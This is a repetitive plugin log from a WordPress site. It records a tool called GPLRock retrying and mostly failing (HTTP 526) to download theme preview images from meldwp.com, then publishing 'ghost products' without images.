08:55:26 UTC] GPLRock: Image download failed for product swipy-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swipy---creative-agency-wordpress-theme-32693.webp for product swipy-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:28 UTC] GPLRock: Image download failed for product swipy-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:30 UTC] GPLRock: Image download failed for product swipy-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/swipy---creative-agency-wordpress-theme-32693.webp for product swipy-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:32 UTC] GPLRock WARNING: Image download failed for product swipy-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/swipy---creative-agency-wordpress-theme-32693.webp [06-Apr-2026 08:55:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: swipy-creative-agency-wordpress-theme [06-Apr-2026 08:55:32 UTC] GPLRock: Image download failed for product discussion-news-portal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:34 UTC] GPLRock: Image download failed for product discussion-news-portal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/discussion---news-portal-wordpress-theme-25726.webp for product discussion-news-portal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:36 UTC] GPLRock: Image download failed for product discussion-news-portal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:39 UTC] GPLRock: Image download failed for product discussion-news-portal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/discussion---news-portal-wordpress-theme-25726.webp for product discussion-news-portal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:41 UTC] GPLRock WARNING: Image download failed for product discussion-news-portal-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/discussion---news-portal-wordpress-theme-25726.webp [06-Apr-2026 08:55:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: discussion-news-portal-wordpress-theme [06-Apr-2026 08:55:41 UTC] GPLRock: Image download failed for product petmania-pet-care-shop-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:43 UTC] GPLRock: Image download failed for product petmania-pet-care-shop-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petmania---pet-care-shop-ecommerce-wordpress-theme-9486.webp for product petmania-pet-care-shop-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:45 UTC] GPLRock: Image download failed for product petmania-pet-care-shop-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:47 UTC] GPLRock: Image download failed for product petmania-pet-care-shop-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petmania---pet-care-shop-ecommerce-wordpress-theme-9486.webp for product petmania-pet-care-shop-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:49 UTC] GPLRock WARNING: Image download failed for product petmania-pet-care-shop-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/petmania---pet-care-shop-ecommerce-wordpress-theme-9486.webp [06-Apr-2026 08:55:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: petmania-pet-care-shop-ecommerce-wordpress-theme [06-Apr-2026 08:55:50 UTC] GPLRock: Image download failed for product endor-creative-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:52 UTC] GPLRock: Image download failed for product endor-creative-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/endor---creative-photography-portfolio-wordpress-theme-30397.webp for product endor-creative-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:54 UTC] GPLRock: Image download failed for product endor-creative-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:56 UTC] GPLRock: Image download failed for product endor-creative-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/endor---creative-photography-portfolio-wordpress-theme-30397.webp for product endor-creative-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:58 UTC] GPLRock WARNING: Image download failed for product endor-creative-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/endor---creative-photography-portfolio-wordpress-theme-30397.webp [06-Apr-2026 08:55:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: endor-creative-photography-portfolio-wordpress-theme [06-Apr-2026 08:55:58 UTC] GPLRock: Image download failed for product beauty-spa-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:00 UTC] GPLRock: Image download failed for product beauty-spa-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beauty-spa---wordpress-cms-theme-23143.webp for product beauty-spa-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:56:04 UTC] GPLRock: Image download failed for product beauty-spa-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:06 UTC] GPLRock: Image download failed for product beauty-spa-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beauty-spa---wordpress-cms-theme-23143.webp for product beauty-spa-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:56:08 UTC] GPLRock WARNING: Image download failed for product beauty-spa-wordpress-cms-theme. URL: https://meldwp.com/wp-content/uploads/beauty-spa---wordpress-cms-theme-23143.webp [06-Apr-2026 08:56:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: beauty-spa-wordpress-cms-theme [06-Apr-2026 08:56:08 UTC] GPLRock: Image download failed for product sweeny-cake-ice-cream-bakery-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:11 UTC] GPLRock: Image download failed for product sweeny-cake-ice-cream-bakery-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sweeny---cake-ice-cream--bakery-store-wordpress-theme-13629.webp for product sweeny-cake-ice-cream-bakery-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:56:13 UTC] GPLRock: Image download failed for product sweeny-cake-ice-cream-bakery-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:15 UTC] GPLRock: Image download failed for product sweeny-cake-ice-cream-bakery-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sweeny---cake-ice-cream--bakery-store-wordpress-theme-13629.webp for product sweeny-cake-ice-cream-bakery-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:56:17 UTC] GPLRock WARNING: Image download failed for product sweeny-cake-ice-cream-bakery-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sweeny---cake-ice-cream--bakery-store-wordpress-theme-13629.webp [06-Apr-2026 08:56:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sweeny-cake-ice-cream-bakery-store-wordpress-theme [06-Apr-2026 08:56:17 UTC] GPLRock: Image download failed for product rythmo-arts-music-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:19 UTC] GPLRock: Image download failed for product rythmo-arts-music-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rythmo--arts--music-school-wordpress-theme-29206.webp for product rythmo-arts-music-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:56:21 UTC] GPLRock: Image download failed for product rythmo-arts-music-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:23 UTC] GPLRock: Image download failed for product rythmo-arts-music-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:56:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rythmo--arts--music-school-wordpress-theme-29206.webp for product rythmo-arts-music-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:56:26 UTC] GPLRock WARNING: Image download failed for product rythmo-arts-music-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rythmo--arts--music-school-wordpress-theme-29206.webp [06-Apr-2026 08:56:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rythmo-arts-music-school-wordpress-theme [06-Apr-2026 08:58:36 UTC] GPLRock: Image download failed for product augmit-it-solution-and-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:36 UTC] GPLRock: Image download failed for product vixan-digital-agency-portfolio-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:38 UTC] GPLRock: Image download failed for product augmit-it-solution-and-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:38 UTC] GPLRock: Image download failed for product vixan-digital-agency-portfolio-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/augmit---it-solution-and-technology-wordpress-theme-15224.webp for product augmit-it-solution-and-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vixan---digital-agency-portfolio-elementor-wordpress-theme-11343.webp for product vixan-digital-agency-portfolio-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:40 UTC] GPLRock: Image download failed for product augmit-it-solution-and-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:40 UTC] GPLRock: Image download failed for product vixan-digital-agency-portfolio-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:42 UTC] GPLRock: Image download failed for product vixan-digital-agency-portfolio-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:42 UTC] GPLRock: Image download failed for product augmit-it-solution-and-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vixan---digital-agency-portfolio-elementor-wordpress-theme-11343.webp for product vixan-digital-agency-portfolio-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:44 UTC] GPLRock WARNING: Image download failed for product vixan-digital-agency-portfolio-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vixan---digital-agency-portfolio-elementor-wordpress-theme-11343.webp [06-Apr-2026 08:58:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/augmit---it-solution-and-technology-wordpress-theme-15224.webp for product augmit-it-solution-and-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:44 UTC] GPLRock WARNING: Image download failed for product augmit-it-solution-and-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/augmit---it-solution-and-technology-wordpress-theme-15224.webp [06-Apr-2026 08:58:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vixan-digital-agency-portfolio-elementor-wordpress-theme [06-Apr-2026 08:58:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: augmit-it-solution-and-technology-wordpress-theme [06-Apr-2026 08:58:44 UTC] GPLRock: Image download failed for product raos-responsive-cycling-club-community-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:44 UTC] GPLRock: Image download failed for product agrile-farm-farmer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:46 UTC] GPLRock: Image download failed for product raos-responsive-cycling-club-community-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:46 UTC] GPLRock: Image download failed for product agrile-farm-farmer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/raos---responsive-cycling-club--community-wordpress-theme-8346.webp for product raos-responsive-cycling-club-community-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrile---farm--farmer-wordpress-theme-19875.webp for product agrile-farm-farmer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:48 UTC] GPLRock: Image download failed for product agrile-farm-farmer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:48 UTC] GPLRock: Image download failed for product raos-responsive-cycling-club-community-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:51 UTC] GPLRock: Image download failed for product agrile-farm-farmer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:51 UTC] GPLRock: Image download failed for product raos-responsive-cycling-club-community-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/raos---responsive-cycling-club--community-wordpress-theme-8346.webp for product raos-responsive-cycling-club-community-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:53 UTC] GPLRock WARNING: Image download failed for product raos-responsive-cycling-club-community-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/raos---responsive-cycling-club--community-wordpress-theme-8346.webp [06-Apr-2026 08:58:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrile---farm--farmer-wordpress-theme-19875.webp for product agrile-farm-farmer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:53 UTC] GPLRock WARNING: Image download failed for product agrile-farm-farmer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agrile---farm--farmer-wordpress-theme-19875.webp [06-Apr-2026 08:58:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: raos-responsive-cycling-club-community-wordpress-theme [06-Apr-2026 08:58:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agrile-farm-farmer-wordpress-theme [06-Apr-2026 08:58:53 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:53 UTC] GPLRock: Image download failed for product diopter-creative-responsive-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:55 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:55 UTC] GPLRock: Image download failed for product diopter-creative-responsive-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/toyup---kids-toys-store-woocommerce-wordpress-theme-29338.webp for product toyup-kids-toys-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:57 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/diopter---creative-responsive-photography--portfolio-wordpress-theme-4076.webp for product diopter-creative-responsive-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:58:57 UTC] GPLRock: Image download failed for product diopter-creative-responsive-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:59 UTC] GPLRock: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:58:59 UTC] GPLRock: Image download failed for product diopter-creative-responsive-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/toyup---kids-toys-store-woocommerce-wordpress-theme-29338.webp for product toyup-kids-toys-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:01 UTC] GPLRock WARNING: Image download failed for product toyup-kids-toys-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/toyup---kids-toys-store-woocommerce-wordpress-theme-29338.webp [06-Apr-2026 08:59:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: toyup-kids-toys-store-woocommerce-wordpress-theme [06-Apr-2026 08:59:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/diopter---creative-responsive-photography--portfolio-wordpress-theme-4076.webp for product diopter-creative-responsive-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:01 UTC] GPLRock WARNING: Image download failed for product diopter-creative-responsive-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/diopter---creative-responsive-photography--portfolio-wordpress-theme-4076.webp [06-Apr-2026 08:59:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: diopter-creative-responsive-photography-portfolio-wordpress-theme [06-Apr-2026 08:59:01 UTC] GPLRock: Image download failed for product cake-bakery-pastry-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:01 UTC] GPLRock: Image download failed for product umberto-mushroom-farm-organic-products-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:03 UTC] GPLRock: Image download failed for product cake-bakery-pastry-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:04 UTC] GPLRock: Image download failed for product umberto-mushroom-farm-organic-products-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cake-bakery---pastry-wordpress-18373.webp for product cake-bakery-pastry-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/umberto---mushroom-farm--organic-products-store-wordpress-theme-26016.webp for product umberto-mushroom-farm-organic-products-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:06 UTC] GPLRock: Image download failed for product umberto-mushroom-farm-organic-products-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:06 UTC] GPLRock: Image download failed for product cake-bakery-pastry-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:08 UTC] GPLRock: Image download failed for product cake-bakery-pastry-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:08 UTC] GPLRock: Image download failed for product umberto-mushroom-farm-organic-products-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/umberto---mushroom-farm--organic-products-store-wordpress-theme-26016.webp for product umberto-mushroom-farm-organic-products-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:10 UTC] GPLRock WARNING: Image download failed for product umberto-mushroom-farm-organic-products-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/umberto---mushroom-farm--organic-products-store-wordpress-theme-26016.webp [06-Apr-2026 08:59:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: umberto-mushroom-farm-organic-products-store-wordpress-theme [06-Apr-2026 08:59:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cake-bakery---pastry-wordpress-18373.webp for product cake-bakery-pastry-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:10 UTC] GPLRock WARNING: Image download failed for product cake-bakery-pastry-wordpress. URL: https://meldwp.com/wp-content/uploads/cake-bakery---pastry-wordpress-18373.webp [06-Apr-2026 08:59:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cake-bakery-pastry-wordpress [06-Apr-2026 08:59:10 UTC] GPLRock: Image download failed for product kedavra-clean-multi-concept-elegant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:10 UTC] GPLRock: Image download failed for product micoach-online-courses-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:12 UTC] GPLRock: Image download failed for product kedavra-clean-multi-concept-elegant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:12 UTC] GPLRock: Image download failed for product micoach-online-courses-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kedavra---clean-multi-concept-elegant-theme-13269.webp for product kedavra-clean-multi-concept-elegant-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micoach---online-courses-wordpress-theme--rtl-21331.webp for product micoach-online-courses-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:15 UTC] GPLRock: Image download failed for product micoach-online-courses-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:15 UTC] GPLRock: Image download failed for product kedavra-clean-multi-concept-elegant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:17 UTC] GPLRock: Image download failed for product micoach-online-courses-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:17 UTC] GPLRock: Image download failed for product kedavra-clean-multi-concept-elegant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micoach---online-courses-wordpress-theme--rtl-21331.webp for product micoach-online-courses-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:19 UTC] GPLRock WARNING: Image download failed for product micoach-online-courses-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/micoach---online-courses-wordpress-theme--rtl-21331.webp [06-Apr-2026 08:59:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: micoach-online-courses-wordpress-theme-rtl [06-Apr-2026 08:59:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kedavra---clean-multi-concept-elegant-theme-13269.webp for product kedavra-clean-multi-concept-elegant-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:19 UTC] GPLRock WARNING: Image download failed for product kedavra-clean-multi-concept-elegant-theme. URL: https://meldwp.com/wp-content/uploads/kedavra---clean-multi-concept-elegant-theme-13269.webp [06-Apr-2026 08:59:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kedavra-clean-multi-concept-elegant-theme [06-Apr-2026 08:59:19 UTC] GPLRock: Image downloaded successfully for product sasby-app-landing-saas-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4752cdad.webp [06-Apr-2026 08:59:19 UTC] GPLRock: Using pre-downloaded image for product sasby-app-landing-saas-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4752cdad.webp [06-Apr-2026 08:59:19 UTC] GPLRock: Ghost product published with image - Product ID: sasby-app-landing-saas-wordpress-theme [06-Apr-2026 08:59:19 UTC] GPLRock: Image download failed for product dizy-creative-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:19 UTC] GPLRock: Image download failed for product winwood-sports-outdoor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:21 UTC] GPLRock: Image download failed for product dizy-creative-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:21 UTC] GPLRock: Image download failed for product winwood-sports-outdoor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dizy---creative-portfolio-theme-24781.webp for product dizy-creative-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:23 UTC] GPLRock: Image download failed for product dizy-creative-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/winwood---sports--outdoor-wordpress-theme-16764.webp for product winwood-sports-outdoor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:23 UTC] GPLRock: Image download failed for product winwood-sports-outdoor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:25 UTC] GPLRock: Image download failed for product dizy-creative-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:25 UTC] GPLRock: Image download failed for product winwood-sports-outdoor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dizy---creative-portfolio-theme-24781.webp for product dizy-creative-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:27 UTC] GPLRock WARNING: Image download failed for product dizy-creative-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/dizy---creative-portfolio-theme-24781.webp [06-Apr-2026 08:59:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dizy-creative-portfolio-theme [06-Apr-2026 08:59:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/winwood---sports--outdoor-wordpress-theme-16764.webp for product winwood-sports-outdoor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:27 UTC] GPLRock WARNING: Image download failed for product winwood-sports-outdoor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/winwood---sports--outdoor-wordpress-theme-16764.webp [06-Apr-2026 08:59:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: winwood-sports-outdoor-wordpress-theme [06-Apr-2026 08:59:28 UTC] GPLRock: Image download failed for product persona-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:28 UTC] GPLRock: Image download failed for product alex-stone-gym-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:30 UTC] GPLRock: Image download failed for product persona-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:30 UTC] GPLRock: Image download failed for product alex-stone-gym-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:59:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/persona---portfolio-wordpress-theme-8108.webp for product persona-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:59:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alex-stone--gym--coach-wordpress-theme-20265.webp for product alex-stone-gym-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: 